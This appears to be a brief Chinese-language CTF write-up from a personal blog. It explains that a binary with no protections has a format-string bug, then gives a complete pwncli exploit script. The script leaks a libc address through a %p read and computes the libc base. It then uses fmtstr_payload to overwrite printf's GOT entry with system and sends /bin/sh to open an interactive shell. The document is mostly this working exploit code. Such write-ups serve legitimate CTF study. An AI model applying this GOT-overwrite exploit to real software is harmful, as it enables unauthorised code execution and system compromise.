解题思路
什么保护都没有,几乎是白给。经典的格式化字符串,这里选择修改printf的got表内容为system然后再输入/bin/sh拿shell
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
|
from pwncli import *
cli_script()
p = gift['io']
libc = gift['libc']
def fmt_attack(p, fmt):
p.sendlineafter("3) Exit\n", "1")
p.sendline(fmt)
p.sendlineafter("3) Exit\n", "2")
msg = p.recvline()
info("msg recv: {}".format(msg))
return msg
msg = fmt_attack(p, "%275$p")
libc_base_addr = int16(msg.decode()) - libc.sym['__libc_start_main'] -241
libc.address = libc_base_addr
log_address("libc_base_addr", libc_base_addr)
payload = fmtstr_payload(offset=16, writes={0x804a010:libc.sym['system']}, write_size="short", write_size_max="short")
fmt_attack(p, payload)
p.sendlineafter("3) Exit\n", "1")
p.sendline("/bin/sh")
p.sendlineafter("3) Exit\n", "2")
p.interactive()
|
引用与参考
1、My Blog
2、Ctf Wiki
3、pwncli
roderick
支付宝
微信